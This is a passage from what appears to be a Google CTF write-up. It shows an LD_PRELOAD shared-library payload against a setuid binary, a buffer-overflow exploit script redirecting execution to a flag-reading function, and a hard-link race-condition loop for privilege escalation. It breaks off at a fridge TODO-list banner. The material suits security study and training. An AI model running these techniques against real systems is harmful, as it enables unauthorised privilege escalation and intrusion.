50SAQEBAQEBAQEBAQGB/wXg/Gbdc26aoEptB1Sk5Sup+yTVXQjF9PznOurDI9taauF86Hqu/Kdlq0TsAXoIFM58VunhTDhz+TgtP4f6T1C7Atqn1j3TGXcMnC09QC08v8IZ0guorbWwfLyFHeeL1Ea5/pYtZ/wxWt+iPsxjnfpttPxX6nvPnv6bgHPsPLbQ9U1Sewu1Ge4c78jQ0HWxjcP6ZE4rxgbkzXLflVdtudy5+rO+w3hWBkJ+fMhdf5YPu+vO8i3u/mD5VneeWb7NXR+Wb3fXmeUj7n5g+WjjYDTDn4NivvwKNO3Ld7j5Fiy/0r2vWL7T9xB6GHW5eQIs343ivvwq9z5l+XPd+5Plz/PdL2F8F8H5bZZf00ggYfjz3f3D8heguC/f08Q5eSCnLZ4n/59CPvPZSfnjHH8x5escv9XuozEeuH+T9nXz/BRoO33ces3Y9Zvn+emA8Qd9rufssm50IsaX+Nd/2R5P8/551W6nef7ftvnm9X3ffm/eV1/Qdvj1+s7mm9f9N3s8zfdLWPLPs+iR/PMsrpH88yluCGhnbwCfCmjfCKj/SED95yX/vA+UMsyyWclk5BRqpHWoZkFNkfSNMlLVdEmdypcmtbyaNktGWdUqVZQqFabzuqmn5a1Xb+73r0TyPXKqZhjajKoXTWMGZQytoKvpSqEwgyUeT8U1TaaqXp3GI1LV5L7BsYSa2D1Mck9Ig6SvcknNasU0SSwZvm334NiuIcyO7J5QEwoVKMP7MDU+NgTSkdE9OwdH1T3J5M2JcXV8cOdoArOkW8g8ice9mSZ/lOfipq/YqSqszk5m4ZpiM2jspBefzs4icYZVIbk8UzC1SWxNw7FZuCqWTF2eKlbkyUoun74yl0a2l9XKWSSnZ4pY6VjTcEru1o1yrlRkHBWXGXpeIxXp1XTeRLI9a+RSnirhC1Ov4nd7bWSjlNZMDcl6li5vNm00PEfqrLOjgGvcg1bIpRBp0enEaWeyXEYy3mwFvCv8du9fBonzSKwEX89B+W4A/uuUnMT7GcdCbnwWYi3o4Wue/wmApCeu8PQPcQLYuqdfyaOHb5Y4bRv0EE+AhfgSIHG+gpxYD/QQd4CFOBPGH+IsyRNb9ughPnFtwPgBaVoGeohjwEK8ys8ffP4i1e+kPsQ7YA949Gt89FXUyPGzweVzQlwN4Ne/zOkhfgK7l6vPp40+yOkhzgLLz1eEs49xeogfwK7mFpwP1w5zevjeBRvl6vOf/yjVu+FtjLV8BMTvv2c4fVDeaFD/L3F6iBfB3s/V5+fzNeTEWLC/3DxS2b8+P/8k/ujy6CG+6jlL/UfImXvQu3m6VA/5uS2cDtaR5DNKHj3Es4u9tJ0/6f8zTu/GP/QpyJM+7av/ktNDfDbQx9bj9YBvKAd6iMviAXp+/9Qoxz+0gf6iAL3X+jyaoQNUf4ZOPHn+vwI1//+Iesbuxa39jn2DGzA//lUB+vO2OvY0x/P63wE0Q3xeCD8AAA==" | base64 -d >> exp.so.gz
ls -la
total 8
drwxrwxrwt  2 user user   60 Feb 24 23:35 .
drwxr-xr-x 21 user user 4096 Oct 24 19:10 ..
-rw-r--r--  1 user user 2083 Feb 24 23:35 exp.so.gz

On the server we will use gunzip to extract the file.

gunzip exp*
ls -la
total 20
drwxrwxrwt  2 user user    60 Feb 24 23:35 .
drwxr-xr-x 21 user user  4096 Oct 24 19:10 ..
-rw-r--r--  1 user user 16136 Feb 24 23:35 exp.so

Awesome, from here we can navigate to the filterenv binary and execute it with our LD_PRELOAD function. This should give us the flag.

cd /home/adminimum
ls -la
total 40
drwxr-xr-x 2 nobody    nogroup    4096 Jun 14  2018 .
drwxr-xr-x 4 nobody    nogroup    4096 Jun  6  2018 ..
-rw-r--r-- 1 nobody    nogroup     220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 nobody    nogroup    3771 Aug 31  2015 .bashrc
-rw-r--r-- 1 nobody    nogroup     655 May 16  2017 .profile
-rwsr-xr-x 1 adminimum adminimum 13648 Jun 14  2018 filterenv
-r-------- 1 adminimum adminimum    19 May 24  2018 flag
./filterenv
[*] waiting for new environment
LD_PRELOAD=/tmp/exp.so
LD_PRELOAD=/tmp/exp.so
LD_PRELOAD=/tmp/exp.so
LD_PRELOAD=/tmp/exp.so


CTF{H3ll0-Kingc0p3}
uid=1338(adminimum) gid=1337(user) groups=1337(user)

And just like that we got the flag!

FLAG: CTF{H3ll0-Kingc0p3}

Message of the Day

Upon reading the challenge description we learn that we got access to the Google-Haus smart hub. It seems that the system we are on delivers the ability to print a β€œMessage-of-the-day”. Alright, so I’m guessing we need to exploit something with the messages.

Let’s connect to the motd.ctfcompetition.com server on port 1337 and see what we have to work with.

root@kali:~/Google-CTF/Message Of The Day# nc motd.ctfcompetition.com 1337
Choose functionality to test:
1 - Get user MOTD
2 - Set user MOTD
3 - Set admin MOTD (TODO)
4 - Get admin MOTD
5 - Exit
choice: 

Alright, we notice that we have a few options - one to set a new message for the user and admin, and another option to print the message of the user and admin.

Let’s go through the functionality to see what it does.

root@kali:~/Google-CTF/Message Of The Day# nc motd.ctfcompetition.com 1337
Choose functionality to test:
1 - Get user MOTD
2 - Set user MOTD
3 - Set admin MOTD (TODO)
4 - Get admin MOTD
5 - Exit
choice: 1
MOTD: Welcome back friend!
Choose functionality to test:
1 - Get user MOTD
2 - Set user MOTD
3 - Set admin MOTD (TODO)
4 - Get admin MOTD
5 - Exit
choice: 3
TODO: Allow admin MOTD to be set
Choose functionality to test:
1 - Get user MOTD
2 - Set user MOTD
3 - Set admin MOTD (TODO)
4 - Get admin MOTD
5 - Exit
choice: 4
You're not root!
Choose functionality to test:
1 - Get user MOTD
2 - Set user MOTD
3 - Set admin MOTD (TODO)
4 - Get admin MOTD
5 - Exit
choice: 2
Enter new message of the day
New msg: Testing
New message of the day saved!
Choose functionality to test:
1 - Get user MOTD
2 - Set user MOTD
3 - Set admin MOTD (TODO)
4 - Get admin MOTD
5 - Exit
choice: 1
Testing
Choose functionality to test:
1 - Get user MOTD
2 - Set user MOTD
3 - Set admin MOTD (TODO)
4 - Get admin MOTD
5 - Exit
choice: 2
Enter new message of the day
New msg: %x %x %x
New message of the day saved!
Choose functionality to test:
1 - Get user MOTD
2 - Set user MOTD
3 - Set admin MOTD (TODO)
4 - Get admin MOTD
5 - Exit
choice: 1
1 fffffd7d ffffffda

Awesome, so it seems we found a format string vulnerability in reading the message of the day! At the same time it seems we aren’t running as root so we can’t really set anything for the admin, but that’s okay!

Okay with this in mind, let’s go ahead and download the attachment and extract the files. We should then be presented with the following binary.

root@kali:~/Google-CTF/Message Of The Day# ls
motd
root@kali:~/Google-CTF/Message Of The Day# file motd 
motd: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=48025612558d041aa5521523e5e98194320d1fa4, not stripped

From here let’s open the binary up in IDA, press Shift+F12 to pull up the string window and let’s look for the β€œNew message of the day saved!” string.

Once found, let’s double click that, and in the next window highlight the function, and press x to get the cross reference. From there just follow the cross reference of where the string is called from and we should see the following.

Right away I notice that printf is being used, which allows for format string exploits to occur!

But then I notice something else…

Notice that the vulnerable gets function is used, which doesn’t check buffer lengths. It seems that the source for our string is set to 100h or 256 bytes, so if we can overflow the buffer, what can we do?

Well we know that there is option to write a message as admin, so let’s dig into that to see if we can’t exploit that. We can start by looking for the β€œYou’re not root!” string.

From here, simply follow the cross reference and we should see the following.

Right away we can see that this option calls the getuid function and compares it to 0 or root. If we are root, then the option calls the read_flag function and reads our flag, otherwise we get the not root message.

Okay, so I know we have a format string exploit and a buffer overflow, let’s see where the read_flag function is in memory which we can then use to overwrite the RIP or Instruction Pointer to read the flag.

We can see that the function is at the memory address of 606063A5, from here let’s verify the security properties of the executable.

root@kali:~/Google-CTF/Message Of The Day# checksec motd
[*] '/root/Google-CTF/Message Of The Day/motd'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

Awesome, so there’s no ASLR and no stack canaries, so we can easily attempt a buffer overflow and replace the RIP with the address of the read_flag function. Let’s test this locally.

I will be using PEDA with gdb to make looking at the exploit easier.

First off, let’s create a string of A’s that 256 bytes long, followed by a string of B’s that 8 bytes. The B’s will represent the memory address we want to inject, also reason the B’s are 8 bytes long is because this is an x64 architecture, and not x86 where in x86 addresses are 4 bytes long.

root@kali:~/Google-CTF/Message Of The Day# perl -e 'print "A"x256 . "B"x8'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB

Alright, now let’s start the application in gdb, select choice 2 to write a new message, and enter our generated string.

root@kali:~/Google-CTF/Message Of The Day# gdb -q ./motd
Reading symbols from ./motd...(no debugging symbols found)...done.
gdb-peda$ r
Starting program: /root/Google-CTF/Message Of The Day/motd 
Choose functionality to test:
1 - Get user MOTD
2 - Set user MOTD
3 - Set admin MOTD (TODO)
4 - Get admin MOTD
5 - Exit
choice: 2
Enter new message of the day
New msg: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB
New message of the day saved!

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x1e 
RBX: 0x0 
RCX: 0x7ffff7eca874 (<__GI___libc_write+20>:	cmp    rax,0xfffffffffffff000)
RDX: 0x7ffff7f9d8c0 --> 0x0 
RSI: 0x7ffff7f9c7e3 --> 0xf9d8c0000000000a 
RDI: 0x0 
RBP: 0x4242424242424242 ('BBBBBBBB')
RSP: 0x7fffffffe060 --> 0x7fffffffe178 --> 0x7fffffffe476 ("/root/Google-CTF/Message Of The Day/motd")
RIP: 0x60606300 (<main+167>:	fistp  WORD PTR [rdi-0x7c03ba77])
R8 : 0x7ffff7fa2500 (0x00007ffff7fa2500)
R9 : 0x7fffffffdfa0 ('A' <repeats 176 times>, "BBBBBBBB")
R10: 0x0 
R11: 0x246 
R12: 0x60606060 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffe170 --> 0xa32 ('2\n')
R14: 0x0 
R15: 0x0
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
=> 0x60606300 <main+167>:	fistp  WORD PTR [rdi-0x7c03ba77]
   0x60606306 <main+173>:	jge    0x60606304 <main+171>
   0x60606308 <main+175>:	add    BYTE PTR [rbp+0xe],dh
   0x6060630b <main+178>:	lea    rdi,[rip+0x2a9]        # 0x606065bb
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe060 --> 0x7fffffffe178 --> 0x7fffffffe476 ("/root/Google-CTF/Message Of The Day/motd")
0008| 0x7fffffffe068 --> 0x100000000 
0016| 0x7fffffffe070 --> 0x60606420 (<__libc_csu_init>:	push   r15)
0024| 0x7fffffffe078 --> 0x60606060 (<_start>:	xor    ebp,ebp)
0032| 0x7fffffffe080 --> 0x7fffffffe170 --> 0xa32 ('2\n')
0040| 0x7fffffffe088 --> 0x200000000 
0048| 0x7fffffffe090 --> 0x60606420 (<__libc_csu_init>:	push   r15)
0056| 0x7fffffffe098 --> 0x7ffff7e0409b (<__libc_start_main+235>:	mov    edi,eax)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000060606300 in main ()
gdb-peda$ 

Awesome, right away we notice that the RBP or Base Pointer has been overwritten. This is great for us because when a buffer overflow occurs, the first thing that it will overwrite is the saved RBP (base pointer), then the saved RIP (saved return address) and then the function parameters. This occurs because the stack is in FILO or First In Last Out order.

So if we add 4 more bytes of, let’s say the C character of 0x43 in hex, then we can overwrite the return pointer. Let’s test this.

gdb-peda$ r
Starting program: /root/Google-CTF/Message Of The Day/motd 
Choose functionality to test:
1 - Get user MOTD
2 - Set user MOTD
3 - Set admin MOTD (TODO)
4 - Get admin MOTD
5 - Exit
choice: 2
Enter new message of the day
New msg: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBCCCC
New message of the day saved!

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x1e 
RBX: 0x0 
RCX: 0x7ffff7eca874 (<__GI___libc_write+20>:	cmp    rax,0xfffffffffffff000)
RDX: 0x7ffff7f9d8c0 --> 0x0 
RSI: 0x7ffff7f9c7e3 --> 0xf9d8c0000000000a 
RDI: 0x0 
RBP: 0x4242424242424242 ('BBBBBBBB')
RSP: 0x7fffffffe060 --> 0x7fffffffe178 --> 0x7fffffffe476 ("/root/Google-CTF/Message Of The Day/motd")
RIP: 0x43434343 ('CCCC')
R8 : 0x7ffff7fa2500 (0x00007ffff7fa2500)
R9 : 0x7fffffffdfa0 ('A' <repeats 176 times>, "BBBBBBBBCCCC")
R10: 0x0 
R11: 0x246 
R12: 0x60606060 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffe170 --> 0xa32 ('2\n')
R14: 0x0 
R15: 0x0
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x43434343
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe060 --> 0x7fffffffe178 --> 0x7fffffffe476 ("/root/Google-CTF/Message Of The Day/motd")
0008| 0x7fffffffe068 --> 0x100000000 
0016| 0x7fffffffe070 --> 0x60606420 (<__libc_csu_init>:	push   r15)
0024| 0x7fffffffe078 --> 0x60606060 (<_start>:	xor    ebp,ebp)
0032| 0x7fffffffe080 --> 0x7fffffffe170 --> 0xa32 ('2\n')
0040| 0x7fffffffe088 --> 0x200000000 
0048| 0x7fffffffe090 --> 0x60606420 (<__libc_csu_init>:	push   r15)
0056| 0x7fffffffe098 --> 0x7ffff7e0409b (<__libc_start_main+235>:	mov    edi,eax)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000043434343 in ?? ()
gdb-peda$ 

Awesome, look at that! Our RIP is overwritten and we get a segmentation fault as the return address does not exist!

With this knowledge in mind, let’s go ahead and write an exploit in python that will allow overflow the message buffer, overwrite the EBP with 8 bytes of junk, and then write the read_flag function into the RIP. This should then return to the function and print our flag.

import socket
import struct
import telnetlib

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("motd.ctfcompetition.com", 1337))

s.sendall("2\n")

buff = ("A"*256 + "A"*8 + "\xA5\x63\x60\x60")
s.sendall(buff + "\n")

t = telnetlib.Telnet()
t.sock = s
t.interact()

Once our exploit is ready, let’s execute it and hope for the best!

root@kali:~/Google-CTF/Message Of The Day# python exploit.py 
Choose functionality to test:
1 - Get user MOTD
2 - Set user MOTD
3 - Set admin MOTD (TODO)
4 - Get admin MOTD
5 - Exit
choice: Enter new message of the day
New msg: New message of the day saved!
Admin MOTD is: CTF{m07d_1s_r3t_2_r34d_fl4g}
*** Connection closed by remote host ***

And there we have it, we got the flag!

FLAG: CTF{m07d_1s_r3t_2_r34d_fl4g}

Poetry

Upon reading the challenge description we learn that the Google-Haus is connected to the fridge, but unfortunately the credentials are only readable by root. Luckily for us, it seems there’s another SUID binary that has all the hallmarks of something suspicious.

From here, let’s connect to the poetry.ctfcompetition.com server on port 1337 and see what we have.

root@kali:~/Google-CTF/Poetry# nc poetry.ctfcompetition.com 1337
cd /home
ls -la
total 4
drwxrwxrwt  4 poetry poetry   80 Feb 25 03:02 .
drwxr-xr-x 21 poetry poetry 4096 Oct 24 19:10 ..
drwxr-xr-x  2 poetry poetry   80 Feb 25 03:02 poetry
drwxrwxrwx  2 poetry poetry   40 Feb 25 03:02 user
cd poetry
ls -la
total 900
drwxr-xr-x 2 poetry poetry     80 Feb 25 03:02 .
drwxrwxrwt 4 poetry poetry     80 Feb 25 03:02 ..
-r-------- 1 poetry poetry     19 Feb 25 03:02 flag
-rwsr-xr-x 1 poetry poetry 917192 Feb 25 03:02 poetry

Okay, it seems we have the flag and a binary called poetry. Let’s see what it does.

./poetry
./poetry test test

Huh… okay, nothing’s working, that’s odd.

Oh well, let’s go ahead and download the attachment and extract the files. Maybe the files in there will provide us some guidance.

root@kali:~/Google-CTF/Poetry# ls
poetry
root@kali:~/Google-CTF/Poetry# file poetry 
poetry: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=e453aa91df6a7a666a62fadfa8fb6fffaac5d9ba, not stripped

We see that we have another binary to dig into to, so let’s open it up in IDA and see what it does.

Right from the start we see that the binary calls the getenv function and makes sure that LD_BIND_NOW is set. If it’s not set, then the application jumps to loc_400A95 which then reads the value of the symbolic link of the application via readlink and returns the number of bytes in the destination buffer otherwise it returns an error.

If data is returned it then jumps to loc_400A2C.

The code for this portion of the application can be viewed as the following:

char dest;
if (!getenv("LD_BIND_NOW", argv, envp))
{
	if (readlink("/proc/self/exe", &dest, 4096LL) == -1)
		err(1);
}

Okay, so we know the first part of the application does. Let’s keep digging into the rest of it.

We see that after the readlink function is successful, the application calls the setenv function and sets LD_BIND_NOW to 1. Once that’s done the application jumps to loc_400A5E and re runs the binary via the execv function which then checks to see if the LD_BIND_NOW environmental variable has been set.

So the C code for the rest of this application should look like so:

char dest;
if (!getenv("LD_BIND_NOW", argv, envp))
{
	if (readlink("/proc/self/exe", &dest, 4096LL) == -1)
		err(1);
	if ((unsigned int)setenv("LD_BIND_NOW", "1", 1LL))
		err(1);
	if ((unsigned int)execv(&dest, argv))
		err(1);
}

After looking over this code and file, it seems that a race condition might be present. Let me explain why I think this is true.

The binary first calls the readlink function which get’s the symbolic link of the application via the /proc/self/exe filesystem.

For example, if we copy over our Python binary, execute it, get the pid of the binary and read the /proc/pid/exe filesystem via readlink (since ls uses readlink), we will see the symbolic link of the binary.

root@kali:/tmp# cp /usr/bin/python .
root@kali:/tmp# ./python 
Python 2.7.15+ (default, Nov 28 2018, 16:27:22) 
[GCC 8.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> 
[1]+  Stopped                 ./python
root@kali:/tmp# jobs -p
3805
root@kali:/tmp# ls -la /proc/3805/exe
lrwxrwxrwx 1 root root 0 Feb 24 21:27 /proc/3805/exe -> /tmp/python

Okay, but what happens if that file is deleted? What happens to the symbolic link?

root@kali:/tmp# rm /tmp/python 
root@kali:/tmp# ls -la /proc/3805/exe
lrwxrwxrwx 1 root root 0 Feb 24 21:27 /proc/3805/exe -> '/tmp/python (deleted)'

Interesting, it seems that our application now points to /tmp/python (deleted). So what would happen if we create our own file with the name python (deleted), would that execute? It actually would!

And because the application runs itself again, if we somehow can create a hard link, and remove it during execution then the application should call our deleted file, allowing us to execute a binary of our choice as root.

So in this case, let’s copy over the cat binary and rename it to exp (deleted).

root@kali:~/Google-CTF/Poetry# nc poetry.ctfcompetition.com 1337
cd /home/user
cp /bin/cat 'exp (deleted)'

Once done, let’s execute a bash script that will continuously loop. During this time, we will create a link between the poetry binary and a fake file called exp via the ln function. This exp file will act as the cat binary that we copied over and renamed to exp (deleted).

After the link is created, we will execute exp against the flag, and then we will remove exp. Once exp is removed the symbolic link will point to exp (deleted) which is the cat binary that we copied over, and if we are successful it should print the flag!

Let’s give this a go!

while true; do ln /home/poetry/poetry ./exp; ( ./exp ../poetry/flag & ); rm exp; done
CTF{CV3-2009-1894}
/bin/bash: line 3: ./exp: No such file or directory
/bin/bash: fork: retry: No child processes

And just like that we got the flag!

As a side note, CVE-2009-1894 was an actual Race Condition vulnerability in PulseAudio that utilized the same exploit as we just demonstrated.

FLAG: CTF{CV3-2009-1894}

Fridge Todo List

Upon reading the challenge description we learn that the smart fridge 2000 has a TODO list network service that Wintermuted seems to use as a password storage medium. It’s our job to find a bug that will leak the notes and possibly reveal the password.

Alright with that in mind, let’s connect to the service and see what we can do.

root@kali:~/Google-CTF/Fridge Todo List# nc fridge-todo-list.ctfcompetition.com 1337
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—        
β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β•šβ•β•β–ˆβ–ˆβ•”β•β•β•    β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β• β–ˆβ–ˆβ•”β•β•β•β•β•    β•šβ•β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ•—       
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β–ˆβ–ˆβ–ˆβ–ˆβ•”β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•   β–ˆβ–ˆβ•‘       β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—       β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ•‘       
β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•‘       β–ˆβ–ˆβ•”β•β•β•  β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•      β–ˆβ–ˆβ•”β•β•β•β• β–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘       
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ•β• β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘       β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•       
β•šβ•β•β•β•β•β•β•β•šβ•β•     β•šβ•β•β•šβ•β•  β•šβ•β•β•šβ•β•  β•šβ•β•   β•šβ•β•       β•šβ•β•     β•šβ•β•  β•šβ•β•β•šβ•β•β•šβ•β•β•β•β•β•  β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β•β•    β•šβ•β•β•β•β•β•β• β•šβ•β•β•β•β•β•  β•šβ•β•β•β•β•β•  β•šβ•β•β•β•β•β•        
                                                                                                                                          
 β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—     β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—     β–ˆβ–ˆβ•—     β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—    β•šβ•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—    β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β•šβ•β•β–ˆβ–ˆβ•”β•β•β•
